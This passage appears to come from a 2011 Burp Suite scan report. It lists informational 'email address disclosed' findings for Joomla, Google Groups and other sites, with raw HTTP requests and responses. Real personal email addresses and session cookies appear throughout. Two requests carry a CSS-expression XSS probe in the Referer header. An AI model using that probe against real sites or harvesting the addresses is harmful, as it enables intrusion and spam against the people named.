<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<a href="http://www.google.com/calendar/embed?src=calendar@joomla.org" class="external text" title="http://www.google.com/calendar/embed?src=calendar@joomla.org" rel="nofollow">
...[SNIP]...

24.64. http://docs.joomla.org/Joomla!_Extension_Directory_FAQs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Joomla!_Extension_Directory_FAQs

Issue detail

The following email address was disclosed in the response:
  • team@extensions.joomla.org

Request

GET /Joomla!_Extension_Directory_FAQs HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Mon, 20 Sep 2010 18:01:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<a href="mailto:team@extensions.joomla.org" class="external text" title="mailto:team@extensions.joomla.org" rel="nofollow">team@extensions.joomla.org</a>
...[SNIP]...

24.65. http://docs.joomla.org/Tutorial:Creating_a_basic_Joomla!_template

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /Tutorial:Creating_a_basic_Joomla!_template

Issue detail

The following email address was disclosed in the response:
  • john@example.com

Request

GET /Tutorial:Creating_a_basic_Joomla!_template HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Sun, 16 Jan 2011 13:42:39 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</span>john@example.com<span class="sc3">
...[SNIP]...

24.66. http://feeds.joomla.org/JoomlaSecurityNews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.joomla.org
Path:   /JoomlaSecurityNews

Issue detail

The following email addresses were disclosed in the response:
  • dextercowley@gmail.com
  • ian.maclennan@help.joomla.org

Request

GET /JoomlaSecurityNews HTTP/1.1
Host: feeds.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/xml; charset=UTF-8
ETag: /OLxMNY4upqeuGOHCTC+TV1Gu6I
Last-Modified: Mon, 24 Jan 2011 22:33:01 GMT
Date: Mon, 24 Jan 2011 22:35:36 GMT
Expires: Mon, 24 Jan 2011 22:35:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.joomla.org/~d
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>dextercowley@gmail.com (Mark Dexter)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...
<author>ian.maclennan@help.joomla.org (Ian MacLennan)</author>
...[SNIP]...

24.67. http://golded-plus.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://golded-plus.sourceforge.net
Path:   /

Issue detail

The following email address was disclosed in the response:
  • asa@eed.miee.ru

Request

GET / HTTP/1.1
Host: golded-plus.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:35:43 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sun, 12 Mar 2006 19:35:39 GMT
ETag: "2ea1-40ed154b5d8c0"
Accept-Ranges: bytes
Content-Length: 11937
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:35:43 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>GoldED+</title>
   <link rev=made href="mailto:asa@eed.miee.ru">
   <style type=text/css>
       .titlebar {
           font-
...[SNIP]...

24.68. http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

Issue detail

The following email addresses were disclosed in the response:
  • 85073eab-0140-46ab-8c0a-2f6a454f6578@k9g2000pre.googlegroups.com
  • donstockba...@hotmail.com

Request

GET /group/alt.slack/msg/fa1fe1e3e6c31c9b/x22 HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d88e74c2ce639c72:TM=1295908559:LM=1295908559:S=1dDmt8z2wKvU3vZb; expires=Wed, 23-Jan-2013 22:35:59 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:35:59 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<input id="hdn_author" type=hidden value="Don Stockbauer &lt;donstockba...@hotmail.com&gt;">
...[SNIP]...
<!--


var msg = G2_cardManager._getMessage("fa1fe1e3e6c31c9b");
msg._init("fa1fe1e3e6c31c9b", "85073eab-0140-46ab-8c0a-2f6a454f6578@k9g2000pre.googlegroups.com",
true,
"none", true, false,
"");


msg._addPreLoadHook(function() {

this._setPostCriticalWarning(document.getElementById("peml").inne
...[SNIP]...

24.69. http://groups.google.com/group/joomla-commits/topics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/joomla-commits/topics

Issue detail

The following email addresses were disclosed in the response:
  • hood...@jcode001.directrouter.com
  • infograf...@jcode001.directrouter.com
  • joomla-commits@joomlacode.org

Request

GET /group/joomla-commits/topics HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=1f5b6d5c3757484d:TM=1295908558:LM=1295908558:S=Imk6vvNPJNnIIJTB; expires=Wed, 23-Jan-2013 22:35:58 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:35:58 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<b>infograf...@jcode001.directrouter.com</b>
...[SNIP]...
<b>infograf...@jcode001.directrouter.com</b>
...[SNIP]...
<b>hood...@jcode001.directrouter.com</b>
...[SNIP]...
<b>infograf...@jcode001.directrouter.com</b>
...[SNIP]...
<b>infograf...@jcode001.directrouter.com</b>
...[SNIP]...
<b>infograf...@jcode001.directrouter.com</b>
...[SNIP]...
<b>infograf...@jcode001.directrouter.com</b>
...[SNIP]...
<b>infograf...@jcode001.directrouter.com</b>
...[SNIP]...
<b>infograf...@jcode001.directrouter.com</b>
...[SNIP]...
<b>infograf...@jcode001.directrouter.com</b>
...[SNIP]...
<a href="mailto:joomla-commits@joomlacode.org" class="on">joomla-commits@joomlacode.org</a>
...[SNIP]...

24.70. http://groups.google.com/group/joomla-dev-framework

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/joomla-dev-framework

Issue detail

The following email addresses were disclosed in the response:
  • joomla-dev-framework@googlegroups.com
  • pdnmu...@gmail.com

Request

GET /group/joomla-dev-framework HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Jan 2011 22:35:59 GMT
Expires: Mon, 24 Jan 2011 22:35:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
<a href="/group/joomla-dev-framework/t/d9e17cd382a64f96" class="on">Digest for joomla-dev-framework@googlegroups.com - 2 Messages in 2 Topics</a>
...[SNIP]...
<span style="color: #777">
By pdnmu...@gmail.com -
Jan 13 - 1 author -
0 replies
</span>
...[SNIP]...
<a href="/group/joomla-dev-framework/t/5cb2e614a23a7cbf" class="on">Digest for joomla-dev-framework@googlegroups.com - 7 Messages in 1 Topic</a>
...[SNIP]...
<a href="mailto:joomla-dev-framework@googlegroups.com" class="on">joomla-dev-framework@googlegroups.com</a>
...[SNIP]...

24.71. http://groups.google.com/group/joomla-dev-general

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/joomla-dev-general

Issue detail

The following email address was disclosed in the response:
  • joomla-dev-general@googlegroups.com

Request

GET /group/joomla-dev-general HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Jan 2011 22:35:58 GMT
Expires: Mon, 24 Jan 2011 22:35:58 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
<a href="mailto:joomla-dev-general@googlegroups.com" class="on">joomla-dev-general@googlegroups.com</a>
...[SNIP]...

24.72. http://groups.google.com/group/joomlabugsquad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/joomlabugsquad

Issue detail

The following email address was disclosed in the response:
  • joomlabugsquad@googlegroups.com

Request

GET /group/joomlabugsquad HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Jan 2011 22:36:57 GMT
Expires: Mon, 24 Jan 2011 22:36:57 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=u
...[SNIP]...
<a href="mailto:joomlabugsquad@googlegroups.com" class="on">joomlabugsquad@googlegroups.com</a>
...[SNIP]...

24.73. http://groups.google.com/groups

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /groups

Issue detail

The following email address was disclosed in the response:
  • janus.nos...@magma.ca

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:04 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=2b64ca1fcad5a4bd:TM=1295908564:LM=1295908564:S=MyGWGTVSpmzhW4bn; expires=Wed, 23-Jan-2013 22:36:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: DiscussionFE
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Groups</title><link href="/groups/search_static/u7kY4_DCZv8/dfe.css" rel="stylesheet" type="text/css"><style>
...[SNIP]...
<span dir=ltr>Janus janus.nos...@magma.ca sci med diseases osteoporosis John Allen wrote: Can </span>
...[SNIP]...

24.74. http://home.arcor.de/kaffeetisch/slrnconf.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.arcor.de
Path:   /kaffeetisch/slrnconf.html

Issue detail

The following email address was disclosed in the response:
  • kaffeetisch@gmx.de

Request

GET /kaffeetisch/slrnconf.html HTTP/1.1
Host: home.arcor.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:24 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2260

<!doctype html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Schmih Schmah Schmuh - Programs - Slrnconf</title>
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<a href="mailto:kaffeetisch@gmx.de">
...[SNIP]...

24.75. http://husky.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://husky.sourceforge.net
Path:   /

Issue detail

The following email addresses were disclosed in the response:
  • husky-cvs@lists.sourceforge.net
  • husky-diffs@lists.sourceforge.net
  • husky-discuss@lists.sourceforge.net
  • mtt@tichy.de
  • tobi@physcip.uni-stuttgart.de

Request

GET / HTTP/1.1
Host: husky.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:36:27 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sun, 07 Jan 2007 16:20:17 GMT
ETag: "2051-42675b0423240"
Accept-Ranges: bytes
Content-Length: 8273
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:36:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- This is the first part of every page here -->

<html>
<head>

<style type="text/css">
<!--
body {margin-top: 0; margin-left:
...[SNIP]...
<a href="mailto:mtt@tichy.de">
...[SNIP]...
<a href="mailto:tobi@physcip.uni-stuttgart.de">
...[SNIP]...
<a href="mailto:husky-discuss@lists.sourceforge.net">husky-discuss@lists.sourceforge.net</a>
...[SNIP]...
<li>via mailinglist: (husky-diffs@lists.sourceforge.net). You can
subscribe/unsubscribe using
<a href="http://lists.sourceforge.net/mailman/listinfo/husky-diffs">
...[SNIP]...
<li>via mailinglist: (husky-cvs@lists.sourceforge.net). You can
subscribe/unsubscribe using
<a href="http://lists.sourceforge.net/mailman/listinfo/husky-cvs">
...[SNIP]...

24.76. http://investor.autobytel.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investor.autobytel.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:
  • jimh@autobytel.com
  • lberman@pondel.com

Request

GET / HTTP/1.1
Host: investor.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:38:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NOMOBILE=0;path=/
Set-Cookie: ABTL_SESSION=1141928628%7C%20%7Bts%20%272011%2D01%2D24%2017%3A38%3A10%27%7D%7C%20%7Bts%20%272011%2D01%2D24%2017%3A38%3A10%27%7D%7C60ECCF3B67CEBC540B254D5622D5AEF8;domain=investor.autobytel.com;expires=Tue, 24-Jan-2012 22:38:10 GMT;path=/
Set-Cookie: ABTL_BRIEFCASE=UPDATED%7C40477%2E734838;domain=investor.autobytel.com;expires=Tue, 24-Jan-2012 22:38:10 GMT;path=/
Set-Cookie: ABTL_PREVIEW=;expires=Sun, 24-Jan-2010 22:38:10 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Overview ><
...[SNIP]...
<a href="mailto:jimh@autobytel.com">jimh@autobytel.com</a>
...[SNIP]...
<a href="mailto:lberman@pondel.com">lberman@pondel.com</a>
...[SNIP]...

24.77. http://joomlacode.org/gf/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/

Issue detail

The following email addresses were disclosed in the response:
  • infografjms@gmail.com
  • joomlacode@copyn.plus.com
  • juanfe@juanfeyana.com
  • mark@nealstudio.com
  • nbraczek@bsds.de
  • wfar01@yahoo.co.uk

Request

GET /gf/?action=Rss&section=activity&project_id=5 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:58:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 7581
Connection: close
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="ISO-8859-1"?>
<rss version="2.0">
<channel>
<title>JoomlaCode - Joomla! - Activity</title>
<link>http://joomlacode.org/gf/</link>
<description>Gforge Advanced Server RSS<
...[SNIP]...
<author>bill richardson &lt;wfar01@yahoo.co.uk&gt;</author>
...[SNIP]...
<author>Mark Neal &lt;mark@nealstudio.com&gt;</author>
...[SNIP]...
<author>bill richardson &lt;wfar01@yahoo.co.uk&gt;</author>
...[SNIP]...
<author>bill richardson &lt;wfar01@yahoo.co.uk&gt;</author>
...[SNIP]...
<author>Niels Braczek &lt;nbraczek@bsds.de&gt;</author>
...[SNIP]...
<author>Geraint Edwards &lt;joomlacode@copyn.plus.com&gt;</author>
...[SNIP]...
<author>Jean-Marie Simonet &lt;infografjms@gmail.com&gt;</author>
...[SNIP]...
<author>Jean-Marie Simonet &lt;infografjms@gmail.com&gt;</author>
...[SNIP]...
<author>Jean-Marie Simonet &lt;infografjms@gmail.com&gt;</author>
...[SNIP]...
<author>Jean-Marie Simonet &lt;infografjms@gmail.com&gt;</author>
...[SNIP]...
<author>Jean-Marie Simonet &lt;infografjms@gmail.com&gt;</author>
...[SNIP]...
<author>Jean-Marie Simonet &lt;infografjms@gmail.com&gt;</author>
...[SNIP]...
<author>Juan Felix Mateos &lt;juanfe@juanfeyana.com&gt;</author>
...[SNIP]...
<author>Juan Felix Mateos &lt;juanfe@juanfeyana.com&gt;</author>
...[SNIP]...
<author>bill richardson &lt;wfar01@yahoo.co.uk&gt;</author>
...[SNIP]...

24.78. http://joomlacode.org/gf/project/bm01/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/bm01/

Issue detail

The following email address was disclosed in the response:
  • azmi@moduletech.com.my

Request

GET /gf/project/bm01/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:45:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<span title="Click for alternate translations">Sebarang komen dan pandangan sila email ke azmi@moduletech.com.my </span>
...[SNIP]...

24.79. http://joomlacode.org/gf/project/joomla/scmsvn/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/scmsvn/

Issue detail

The following email address was disclosed in the response:
  • root@joomlacode.org

Request

GET /gf/project/joomla/scmsvn/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<a href='/gf/project/joomla/scmsvn/?action=browse&amp;path=mailto%3Aroot%40joomlacode.org'>root@joomlacode.org</a>
...[SNIP]...

24.80. http://joomlacode.org/mktree.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /mktree.js

Issue detail

The following email addresses were disclosed in the response:
  • matt@mattkruse.com
  • sil@kryogenix.org

Request

GET /mktree.js HTTP/1.1
Host: joomlacode.org
Proxy-Connection: keep-alive
Referer: http://joomlacode.org/gf/project/joomla/tracker/?3ee00%22style%3d%22x%3aexpression(alert(1))%22744e3c5545f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 31 Aug 2008 22:24:24 GMT
ETag: "13586a3-180f-455c8f2e8b600"
Accept-Ranges: bytes
Content-Length: 6159
Connection: close
Content-Type: application/x-javascript

// ===================================================================
// Author: Matt Kruse <matt@mattkruse.com>
// WWW: http://www.mattkruse.com/
//
// NOTICE: You may use this code for any purpose,
...[SNIP]...
name as being "liOpen" (see example)
/*
This code is inspired by and extended from Stuart Langridge's aqlist code:
       http://www.kryogenix.org/code/browser/aqlists/
       Stuart Langridge, November 2002
       sil@kryogenix.org
       Inspired by Aaron's labels.js (http://youngpup.net/demos/labels/)
       and Dave Lindquist's menuDropDown.js (http://www.gazingus.org/dhtml/?id=109)
*/

// Automatically attach a listener to the window
...[SNIP]...

24.81. http://joomlacode.org/tabber.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /tabber.js

Issue detail

The following email address was disclosed in the response:
  • pat@barelyfitz.com

Request

GET /tabber.js HTTP/1.1
Host: joomlacode.org
Proxy-Connection: keep-alive
Referer: http://joomlacode.org/gf/project/joomla/tracker/?3ee00%22style%3d%22x%3aexpression(alert(1))%22744e3c5545f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 31 Aug 2008 22:24:14 GMT
ETag: "13586ce-3ea7-455c8f2501f80"
Accept-Ranges: bytes
Content-Length: 16039
Connection: close
Content-Type: application/x-javascript

/*==================================================
$Id: tabber.js,v 1.9 2006/04/27 20:51:51 pat Exp $
tabber.js by Patrick Fitzgerald pat@barelyfitz.com

Documentation can be found at the following URL:
http://www.barelyfitz.com/projects/tabber/

License (http://www.opensource.org/licenses/mit-license.php)

Copyright (c) 2006 Patrick Fi
...[SNIP]...

24.82. http://jqueryui.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The following email addresses were disclosed in the response:
  • contact@appendTo.com
  • contact@appendto.com
  • hello@filamentgroup.com

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:38:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 14599

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

24.83. http://kickapps.yuku.com/service/searchEverythingAsRss.kickAction

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kickapps.yuku.com
Path:   /service/searchEverythingAsRss.kickAction

Issue detail

The following email address was disclosed in the response:
  • boards@parenthood.com

Request

GET /service/searchEverythingAsRss.kickAction?vars=service/searchEverything.kickAction&keywords=editorspick&includeVideo=on&includeAudio=on&includePhoto=on&includeBlog=on&includeUser=on&includeGroups=on&includeMessages=on&as=40337&quantity=25 HTTP/1.1
Host: kickapps.yuku.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2D292A4D71B9969B4DAEDD671301D676; as=40337

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:07 GMT
Server: Apache/2.2.3 (CentOS)
